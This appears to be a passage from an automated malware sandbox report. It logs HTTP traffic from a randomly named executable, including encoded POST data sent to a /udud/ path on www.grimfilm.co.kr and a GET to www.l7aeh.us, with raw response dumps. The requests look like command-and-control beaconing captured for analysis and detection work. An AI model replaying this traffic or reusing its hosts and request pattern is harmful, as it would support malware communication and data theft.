                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.11.304985091.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:45.526108027 CEST473OUTGET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:46.216331005 CEST1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:32:46 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==
                                                                                                last-modified: Mon, 27 May 2024 10:32:45 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-zspj5
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 76 5a 66 53 51 6c 79 6f 65 6e 57 37 46 69 51 57 30 30 39 75 46 75 61 4b 63 4d 6e 4e 46 72 44 4a 37 53 79 56 57 2f 51 54 57 6d 44 46 45 32 45 37 48 4e 50 7a 6c 31 54 41 2f 6d 6d 77 78 4d 34 6d 51 70 75 65 48 58 74 79 61 65 76 4b 6b 32 6d 6b 6c 53 56 49 4c 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 37 61 65 68 2e 75 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 37 61 65 68 20 52 65 73 6f 75 [TRUNCATED]
                                                                                                Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==><head><meta charset="utf-8"><title>l7aeh.us&nbsp;-&nbsp;l7aeh Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="l7aeh.us is your first and best source for all of the information youre looking for. From general topics to more
                                                                                                May 27, 2024 12:32:46.216424942 CEST1289INData Raw: 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 37 61 65 68 2e 75 73 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20
                                                                                                Data Ascii: of what you would expect to find here, l7aeh.us has it all. We hope you find what you are searching for15D8!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style>
                                                                                                May 27, 2024 12:32:46.216550112 CEST1289INData Raw: 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c
                                                                                                Data Ascii: t,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,
                                                                                                May 27, 2024 12:32:46.216698885 CEST1289INData Raw: 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 6f 6e 74 61 69 6e
                                                                                                Data Ascii: padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{d
                                                                                                May 27, 2024 12:32:46.216711044 CEST1289INData Raw: 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65
                                                                                                Data Ascii: ink{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privac
                                                                                                May 27, 2024 12:32:46.216800928 CEST1289INData Raw: 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d
                                                                                                Data Ascii: enter}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{lin
                                                                                                May 27, 2024 12:32:46.216924906 CEST1289INData Raw: 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65
                                                                                                Data Ascii: n--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{pos
                                                                                                May 27, 2024 12:32:46.217116117 CEST1289INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72
                                                                                                Data Ascii: container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:47px;flex-grow:1;width:60px}.container-content__container-ads{margin-t
                                                                                                May 27, 2024 12:32:46.217130899 CEST890INData Raw: 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f
                                                                                                Data Ascii: wo-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-lin
                                                                                                May 27, 2024 12:32:46.217144966 CEST1289INData Raw: 35 37 36 0d 0a 6c 6f 63 6b 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73
                                                                                                Data Ascii: 576lock__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list
                                                                                                May 27, 2024 12:32:46.405764103 CEST1289INData Raw: 22 61 64 75 6c 74 46 6c 61 67 22 3a 66 61 6c 73 65 2c 22 70 75 22 3a 22 2f 2f 77 77 77 2e 6c 37 61 65 68 2e 75 73 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61 6c 73 65 2c 22 74 6f 53 65 6c 6c 22 3a 66 61 6c 73 65 2c 22 63
                                                                                                Data Ascii: "adultFlag":false,"pu":"//www.l7aeh.us","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","a1DEdblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fY


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.11.3049851183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:52.571681023 CEST745OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 52 31 4a 2f 6c 6b 76 6f 6c 57 78 79 6e 50 4b 36 35 75 30 46 4f 78 6a 5a 56 51 59 76 56 47 6d 39 71 52 47 42 5a 58 71 37 6a 61 32 30 59 79 63 74 45 36 6b 69 37 70 4d 37 65 58 59 5a 6d 6f 55 37 58 4a 4e 2b 64 69 79 31 62 34 48 49 70 75 6b 75 68 58 71 73 45 33 6d 33 38 59 70 44 6f 57 4f 75 45 6a 35 50 6b 2f 4f 44 71 2b 4e 6e 44 38 4c 30 69 50 49 66 6a 72 78 4d 46 53 2f 6c 69 39 69 2b 34 61 6b 2b 65 67 41 65 68 35 47 75 32 44 76 6d 4b 31 75 48 6d 44 78 6a 4c 71 55 4c 74 47 58 75 71 45 77 36 4a 78 44 50 46 79 62 6f 2f 42 31 57 2f 76 4a 48 6a 2b 6b 69 4b 69 76 66 52 64 74 4a 42 51 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxynPK65u0FOxjZVQYvVGm9qRGBZXq7ja20YyctE6ki7pM7eXYZmoU7XJN+diy1b4HIpukuhXqsE3m38YpDoWOuEj5Pk/ODq+NnD8L0iPIfjrxMFS/li9i+4ak+egAeh5Gu2DvmK1uHmDxjLqULtGXuqEw6JxDPFybo/B1W/vJHj+kiKivfRdtJBQ==
                                                                                                May 27, 2024 12:32:53.038614035 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:52 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 8f db c6 f9 9c fd 15 b3 0c ba 22 6d 92 22 25 ed 8b 5a da 48 1c a7 69 9b d4 81 1f 29 5a ef 22 18 91 23 69 bc 14 87 99 19 ae 76 23 0b c8 a1 28 7a 08 7a 49 81 e6 d0 1c 8b 5e 7b e8 a1 87 a0 3f a8 71 fe 43 bf 19 52 22 25 51 bb b1 bd 88 13 50 e4 cc f7 9a ef fd cd 9e ec 7e f0 e8 c1 d3 df 7f fa 10 8d e5 24 b9 b7 73 a2 7e 50 82 d3 51 68 9c 33 e7 37 8f 0d b5 46 70 7c 6f e7 9d 93 09 91 18 45 63 cc 05 91 a1 f1 ec e9 87 ce 91 81 da cb 9d 14 4f 48 68 5c 50 32 cd 18 97 06 8a 58 2a 49 0a 90 53 1a cb 71 18 93 0b 1a 11 47 7f d8 88 a6 54 52 9c 38 22 c2 09 09 7d 4d a7 46 a6 c5 d9 80 49 d1 5a 12 69 4d f0 a5 43 27 78 44 9c 8c 13 c5 24 48 30 1f 91 96 46 94 54 26 e4 de 8f 7f f9 f6 d5 77 ff 7e f5 cf af 7e f8 c7 f7 e8 d5 bf fe fb ea bb 3f a2 57 7f fe 16 bd fa db 9f 5e 7d f7 35 da 7b f7 a8 e3 fb 7d 24 d9 04 4b b6 7f dc 3b 3a 69 17 88 3b 27 09 4d cf 11 27 49 d8 8a 53 a1 38 0c 89 8c c6 2d 34 86 b7 b0 d5 6e 8f 38 9d 0c 69 32 71 23 e6 9e f3 82 e9 12 c7 c0 89 24 3c c5 92 18 48 [TRUNCATED]
                                                                                                Data Ascii: cf0K"m"%ZHi)Z"#iv#(zzI^{?qCR"%QP~$s~PQh37Fp|oEcOHh\P2X*ISqGTR8"}MFIZiMC'xD$H0FT&w~~?W^}5{}$K;:i;'M'IS8-4n8i2q#$<H^ee,ms!^NRBb8"g}_7c,e&u!!qe?|O bB%3iLHI@!,3AI}e|t&@F>mvOir)|DM~M}Gf(O5UMC(c8;B <<p1wwv1h8p`;aFz&Skv9bI"X3g"T=%BNOL}-'9y44y_!8hPd<+$)-k|dCFH:KS)h*8W&qG 2#i7@2Z&H\gM!.V|`1JGDTd<>Fxy1<ablYw`wl<UX{{9yk~4
                                                                                                May 27, 2024 12:32:53.038688898 CEST1289INData Raw: b7 64 5f 03 5e 5b e9 6c ac ec 6f ac 90 9b e9 00 6b ab af 4d 50 e6 85 c2 06 b5 93 c6 0a ac 73 b0 d4 fe c0 1f 18 0d 5b 83 72 cb 9a 97 14 fc ca ea c3 85 d5 55 50 f0 d0 c8 d3 98 0c 69 4a 62 63 37 54 99 9d 0d d1 ef 18 3f 27 fc 97 09 1b e0 e4 49 c4 32
                                                                                                Data Ascii: d_^[lokMPs[rUPiJbc7T?'I2'H2RF ??!O>jv==+.,CxMdq?P=B<^CN>ve{I;dxvKd!7,&hD1$~86/KG!(
                                                                                                May 27, 2024 12:32:53.038803101 CEST1117INData Raw: 81 7a b7 24 d0 06 9d 37 15 68 ff 96 04 da a0 f3 a6 02 1d dc 92 40 1b 74 de 4c a0 19 67 12 ba ab c0 3f f2 62 32 9a ef ec bc 03 ff aa ea 89 61 90 e4 54 9c 07 03 02 9d 34 41 33 bd ff ce 22 bf a2 56 ab 5f ac 14 7d 02 f2 dd 7d 4e 26 e5 5a d9 4b a0 6e
                                                                                                Data Ascii: z$7h@tLg?b2aT4A3"V_}}N&ZKnTE}iH]""::{stlj*Dh)~i>}.\{ R?POpc`=~w z>OG.{Y;^P_J#;v@hR
                                                                                                May 27, 2024 12:32:53.038953066 CEST1289INData Raw: 31 33 36 63 0d 0a c4 5d 6d 8f e3 b8 91 fe 9c fc 0a 62 1a 07 b4 e6 64 43 92 25 d9 ee c6 05 b7 3b 8b 04 fb e1 ee 80 4c f2 e9 32 18 c8 96 ec 16 c6 6d fb 64 bb 5f d6 e8 ff 7e 55 45 52 a2 28 4a a2 65 6f 32 3d fd 62 aa f8 14 59 2a b2 8a c5 a2 64 72 99
                                                                                                Data Ascii: 136c]mbdC%;L2md_~UER(Jeo2=bY*dr'z~Dxr^9T#.~f|JJoaLM=n9Ckjz!KNA7Xx9dmnr9j({b7W>>:47Ox)_`_sZTIw=
                                                                                                May 27, 2024 12:32:53.038966894 CEST1289INData Raw: 02 33 c9 82 ac 67 26 f7 f1 e4 ee a2 58 94 d5 a3 0e a6 1e 89 18 68 d3 d4 a4 69 ca 3b 89 21 45 c5 eb 6a f6 8e 82 2a fa 47 0e 12 86 61 19 d4 e0 01 96 da a8 7c 54 d3 7b 29 cc 05 46 bd b6 35 2e 76 cf cb 55 14 5c 67 c1 04 b7 0e 43 c3 fe 18 b1 c6 d8 5a
                                                                                                Data Ascii: 3g&Xhi;!Ej*Ga|T{)F5.vU\gCZTlt=pA'lF_\IV@^mkm>/DBZbV@eIHNyC$A)9Xr,?U;EU>G<jbu]1+vaf[xwT7Zz`&+j(5Iy\
                                                                                                May 27, 2024 12:32:53.039087057 CEST1289INData Raw: 55 97 7d a5 e7 4c f0 42 7c ec 0d f6 92 ae 73 e8 2f b8 96 62 f4 e0 12 a0 a5 fe ff fd d7 c6 e7 af ef cf 8b dd 46 eb 07 46 b2 31 75 8e a6 13 bf 39 34 ca eb 81 87 39 73 db 7b 5f ea d5 cb ab ae 30 25 ed 44 d0 4a 1d 9c 74 d0 86 82 36 24 ca a8 83 32 12
                                                                                                Data Ascii: U}LB|s/bFF1u949s{_0%DJt6$2@u Mm<g<"xMe8hfD}glY#@?U?|o,Cg&1cgVw,Cp#uC,y_1mSdv7pnjr"W`"q
                                                                                                May 27, 2024 12:32:53.039212942 CEST1113INData Raw: 68 22 a3 d8 0e 89 13 b7 a3 d8 f6 4f 92 b7 23 d9 f6 4d 92 b7 23 85 97 21 85 ed 48 d1 65 48 91 49 33 c9 9e f5 9f 48 be 81 95 bb 86 89 b5 ed bb 86 49 bf 45 bc 06 dd ce 4e 5e c3 e1 72 eb 79 0d b7 ab 6c ea 0d 19 5b 5b da ab 78 0e b0 bf d7 f0 bb dc 2a
                                                                                                Data Ascii: h"O#M#!HeHI3HIEN^ryl[[x*_b[}-5Zn[{gp}Mxtk}=w!7Nn(!eWnMZ$"\\k1_c}L.-){|>5]\a
                                                                                                May 27, 2024 12:32:53.039226055 CEST1289INData Raw: 62 64 63 0d 0a ec 1d 6b 6f 1b c7 f1 b3 f8 2b 16 5b 34 92 11 f3 8e 47 52 0f 2b 24 93 a6 8d d1 a2 31 52 24 7d 7d 10 20 50 7c 58 67 1f 79 57 1e 29 5a 71 0c a8 89 12 38 b6 d1 a4 80 15 ab 41 64 38 80 fb 08 ea a2 72 ad a6 02 fa f8 41 e2 e9 3f 74 66 76
                                                                                                Data Ascii: bdcko+[4GR+$1R$}} P|XgyW)Zq8Ad8rA?tfvxe6 2vvw3{;anx4QGt0klf!g'4SOC$fegLt;.F*i`&9G~Hi$qR;)yi`'u#,(
                                                                                                May 27, 2024 12:32:53.039305925 CEST1289INData Raw: c7 c9 9e 4e 71 3c 59 d8 02 62 08 28 26 e1 38 75 97 f9 14 5d ce 64 e8 cf 4c ea 9e ed 7e 8a 9e 8d a4 9e ed be e8 79 a6 e4 8c f4 17 9e 2a 80 51 5a 4d 34 f9 c0 38 c4 c3 58 60 c8 ad ba 0d ab c9 a5 71 6a b7 a0 2a c8 1d 8c bd f9 0b c5 a5 92 5e 85 05 d8
                                                                                                Data Ascii: Nq<Yb(&8u]dL~y*QZM48X`qj*^KvnT$C&CnZ,4b)-cLU*#nwk<dQ,Q*s<VvY2l|f2vxEx_gs(w0onX*G6s:j<'nh*y?v;&xX
                                                                                                May 27, 2024 12:32:53.039364100 CEST465INData Raw: 65 27 45 ab 17 72 39 5e f1 3e b9 73 b4 ff 15 d8 25 79 1f 8f 21 74 52 33 6d 3a 9e 2c 4d e4 89 6f be 62 e4 2a 15 35 b8 a1 10 ac 79 8a 2f 5c d9 10 c6 41 f7 91 08 97 aa d2 44 ca d4 a7 f3 a6 0e 64 09 31 80 5e ea 59 27 20 57 d1 db ea 6a 18 70 38 2d 6e
                                                                                                Data Ascii: e'Er9^>s%y!tR3m:,Mob*5y/\ADd1^Y' Wjp8-nppObjX}Ix<TYPBN=F:$Q~g8Q*2_TJ{e!z}q0B|tu8pZH8s5;.>x?~Mrlg
                                                                                                May 27, 2024 12:32:53.043066978 CEST501INData Raw: 31 64 61 0d 0a 7c 5d bd 4e c3 30 10 9e e9 53 1c 62 48 5a b5 c9 03 54 30 40 11 aa d4 8d be 80 db 38 25 55 70 90 93 aa 30 20 b1 b0 33 30 30 c2 1b 74 64 e1 85 a0 bc 03 df 39 ce 4f d3 94 a5 49 dc b3 ef fb 7c 97 e8 64 df 25 cd d4 fa 7c aa 5b ea 59 96
                                                                                                Data Ascii: 1da|]N0SbHZT0@8%Up0 300td9OI|d%|[Y@@]Wli]S'@rj{J7/6LKk8/!CT"4h&L@!.7!v*KT~GWn$8+/ku/RK0NL\DJq\ey_Sr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.11.3049852183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:55.391432047 CEST765OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 52 31 4a 2f 6c 6b 76 6f 6c 57 78 79 31 63 53 36 2b 4e 63 46 4d 52 6a 61 4d 67 59 76 62 6d 6d 44 71 52 36 42 5a 57 2b 72 6a 6f 53 30 62 58 34 74 46 37 6b 69 33 4a 4d 37 57 33 59 63 69 6f 55 77 58 4a 78 4d 64 67 32 31 62 34 54 49 70 76 55 75 6d 6b 53 76 47 6e 6d 31 77 34 70 46 73 57 4f 75 45 6a 35 50 6b 2f 62 59 71 2b 46 6e 43 4d 62 30 6b 75 49 65 67 72 78 50 45 53 2f 6c 30 39 69 79 34 61 6c 64 65 69 31 35 68 37 2b 75 32 43 7a 6d 4c 68 79 47 6f 7a 78 35 46 4b 56 42 6a 56 47 57 79 41 45 6d 4e 41 33 69 49 79 61 4e 33 32 45 4d 69 73 39 46 77 65 59 50 57 6a 43 33 54 66 73 53 63 59 4b 53 48 42 64 6b 38 44 61 4a 64 52 32 73 59 61 54 67 2b 63 41 3d
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxy1cS6+NcFMRjaMgYvbmmDqR6BZW+rjoS0bX4tF7ki3JM7W3YcioUwXJxMdg21b4TIpvUumkSvGnm1w4pFsWOuEj5Pk/bYq+FnCMb0kuIegrxPES/l09iy4aldei15h7+u2CzmLhyGozx5FKVBjVGWyAEmNA3iIyaN32EMis9FweYPWjC3TfsScYKSHBdk8DaJdR2sYaTg+cA=
                                                                                                May 27, 2024 12:32:55.841552019 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip
